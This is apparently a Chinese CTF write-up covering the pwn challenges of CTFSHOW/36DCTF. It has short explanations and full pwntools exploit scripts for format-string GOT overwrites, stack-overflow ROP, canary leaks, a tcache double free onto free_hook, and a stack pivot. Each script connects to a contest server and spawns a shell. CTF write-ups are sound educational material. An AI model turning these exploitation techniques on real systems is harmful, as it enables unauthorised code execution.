1p0ch
0%

CTFSHOW/36DCTF的wp(pwn部分)

发表于 更新于 分类于
本文字数: 6.5k 阅读时长 ≈ 6 分钟

好了,比赛结束了,可以康了。比赛⑧错,都是阳间题。

pwn_签到

使用<代替空格,more获得flag

1
more<flag

pwn_babyfmtstr

这里先改写memset的got表为main函数
然后多次利用prinrf泄露地址,往free got写入system函数
最后修复memset的got表继续执行
令motto为/bin/sh\x00
就可以在最后free的时候getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
exp:
# -*- coding: utf-8 -*-
from pwn import *
context(log_level="debug", arch="amd64", os="linux")
#p=process('./pwn3')
p=remote('124.156.121.112',28052)
elf=ELF('./pwn3')
free_plt=elf.plt['free']
free_got=elf.got['free']
mem_got=elf.got['memset']
printf_got=elf.got['printf']
strdup_got=elf.got['strdup']
chk_plt=elf.plt['__stack_chk_fail']
chk_got=elf.got['__stack_chk_fail']
start=0x400aa0
print(hex(free_got))
#400aa0=4197024
p.recv()
#\x29
#offset = 8+2
#0x400e93=3731
payload='%3731c%10$hnaaaa'+p64(mem_got)
p.sendline(payload)
p.recvuntil('please input name:\n')
payload='%13$p'
payload=payload.ljust(32,'a')
p.sendline(payload)
p.recvuntil('Hello ')
addr=int(p.recv(14),16)-148
libc_base=addr-0x6fd00
print(hex(libc_base))
system=libc_base+0x45390
#printf
#0x55800
print(hex(system))
print(hex(system&0xffff))
print(hex((system&0xffff0000)>>16))
print(hex((system&0xffff00000000)>>32))

bss=free_got
p.recvuntil('please input name:\n')
payload='%'+str((system&0xffff))+'c%10$hn'
payload=payload.ljust(16,'a')
payload+=p64(bss)
p.sendline(payload)

p.recvuntil('please input name:\n')
payload='%'+str((system&0xffff0000)>>16)+'c%10$hn'
payload=payload.ljust(16,'a')
payload+=p64(bss+2)
p.sendline(payload)

p.recvuntil('please input name:\n')
payload='%'+str((system&0xffff00000000)>>32)+'c%10$hn'
payload=payload.ljust(16,'a')
payload+=p64(bss+4)
p.sendline(payload)

p.recvuntil('please input name:\n')
#4009c0=2496
print(hex(system))
#gdb.attach(p)
#pause()
#400996
payload='%2454c%10$hnaaaa'+p64(mem_got)
p.sendline(payload)

p.recvuntil('size')
p.sendline('9')
p.recvuntil('please input motto:\n')
p.sendline('/bin/sh\x00')

p.interactive()

pwn_Magicstring

很简单的一道题目
直接栈溢出即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# -*- coding: utf-8 -*-
from pwn import *
context(log_level="debug", arch="amd64", os="linux")
#p=process('./pwn2')
p=remote('124.156.121.112',28040)
elf=ELF('./pwn2')
system=elf.symbols['system']
gets_plt=elf.plt['gets']
bss=0x601060
pop_rdi=0x0400733
pop_rsi_r15=0x400731
padding=0x2a8
payload='a'*padding+p64(pop_rdi)+p64(bss)+p64(gets_plt)+p64(pop_rdi)+p64(bss)+p64(system)
p.recv()
p.sendline(payload)
time.sleep(0.1)
p.sendline('/bin/sh\x00')
time.sleep(0.1)
p.interactive()

pwn_MengxinStack

这个题目pie和canary都开启了
先泄露canary
然后利用main函数返回修改最后一位为libc_start_main+二百三十几的地方,mov rsp rax后call rax,就会重新返回main函数,借机泄露一波libc基址,然后打就完事了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# -*- coding: utf-8 -*-
from pwn import *
context(log_level="debug", arch="amd64", os="linux")
#p=process('./pwn4')
p=remote('124.156.121.112',28015)
elf=ELF('./pwn4')

bss=0x601060
pop_rdi=0x0400733
pop_rsi_r15=0x400731
offset=8
p.recvuntil('She said: hello?')
p.sendline('a'*(0x40-0x18-1)+'b')
p.recvuntil('b\n')
canary=u64(p.recv(7).rjust(8,'\x00'))
print(hex(canary))
payload='a'*0x28+p64(canary)+p64(0)*3+'\x29'
p.send(payload)

payload='a'*0x40+'b'*8
p.recvuntil('She said: hello?')
p.send(payload)
p.recvuntil('bbbbbbbb')
libc_main_addr=u64(p.recv(6).ljust(8,'\x00'))-240
print(hex(libc_main_addr))
libc_base=libc_main_addr-0x20740
print(hex(libc_base))
pop_rdi=0x21102+libc_base 
bin_sh=libc_base+0x18cd57
system=libc_base+0x45390
payload='a'*0x28+p64(canary)+p64(0)*3+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.send(payload)

#p.recv()
#gdb.attach(p)
#pause()
p.interactive()

pwn_babyheap

简单的tcache heap
大小固定,利用double free改写freegot即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context(log_level="debug", arch="amd64", os="linux")
#p=process('./PWN_babyheap')
p=remote('124.156.121.112',28032)
elf=ELF('./PWN_babyheap')
list_addr=0x602060
free_got=elf.got['free']
def add(content):
	p.recvuntil('>>')
	p.sendline('1')
	p.recvuntil('message_of_your 36D:')
	p.sendline(content)

def free(idx):
	p.recvuntil('>>')
	p.sendline('2')
	p.recvuntil('index:')
	p.sendline(str(idx))

def show(idx):
	p.recvuntil('>>')
	p.sendline('3')
	p.recvuntil('index:')
	p.sendline(str(idx))

add('aa')#0
add('aa')#1
add('aa')#2
add('aa')#3
free(0)
free(1)
free(2)
show(2)
heap_addr=u64(p.recvuntil('\x0a',drop=True).ljust(8,'\x00'))-0x290
print(hex(heap_addr))
free(3)
free(3)
add(p64(list_addr))#4
add(p64(list_addr))#5
add(p64(free_got))#6
show(0)
free_addr=u64(p.recv(6).ljust(8,'\x00'))
print(hex(free_addr))
libc=free_addr-0x097950
print(hex(libc))
free_hook=libc+0x3ed8e8
system=libc+0x4f440
add('/bin/sh\x00')#7
add('cc')#8
add('dd')#9
free(9)
free(9)
add(p64(free_hook))
add(p64(free_hook))
add(p64(system))
print(hex(libc))
free(7)
#gdb.attach(p)
#pause()
p.interactive()

pwn_tang

保护全开
应该是先格式化字符串泄露一下canary,接着返回main函数再次泄露libc
然后栈迁移
还是前面的main返回利用,再加上栈迁移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# -*- coding: utf-8 -*-
from pwn import *
context(log_level="debug", arch="amd64", os="linux")
#p=process('./PWN_tang')
p=remote('124.156.121.112',28028)
elf=ELF('./PWN_tang')

###########################1
p.recvline()
#canary
p.sendline('%9$p')
canary=int(p.recv(18),16)
print(hex(canary))
p.recv()
payload='aaaa'
p.send(payload)

p.recv()
payload='a'*0x38+p64(canary)+p64(0)*3+'\x29'
p.send(payload)

###########################2
#23
p.sendline('%23$p')
p.recvline()
libc_main=int(p.recv(14),16)-240
libc_base=libc_main-0x20740
pop_rdi=0x21102+libc_base 
bin_sh=libc_base+0x18cd57
system=libc_base+0x45390
leave_ret=libc_base+0x42351 
one_gadget=libc_base+0xf1147
print(hex(libc_base))
#gdb.attach(p)
#pause()
#payload='a'*0x110+p64(pop_rdi)+p64(bin_sh)+p64(system)

payload='a'*0x38+p64(canary)+p64(0)*3+'\x29'
p.send(payload)
p.recv()
###########################3
p.send('%27$p')
p.recvline()
offset=int(p.recv(14),16)-0x9ed
print(hex(offset))
#payload='a'*0x110+'a'*8+p64(pop_rdi)+p64(bin_sh)+p64(system)
payload='a'*0x110+'a'*8+p64(one_gadget)
p.send(payload)
buf_addr=offset+0x201040
print(hex(buf_addr))
#gdb.attach(p)
#pause()
p.recv()
payload='a'*0x38+p64(canary)+p64(0)*2+p64(buf_addr+0x110)+p64(leave_ret)
p.send(payload)
p.interactive()


#gdb.attach(p)
#pause()
#0x55fd9ae779ed
#0x55fd9ae77000
'''
0x45216	execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a	execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4	execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147	execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''
好饿啊,早知道不学安全了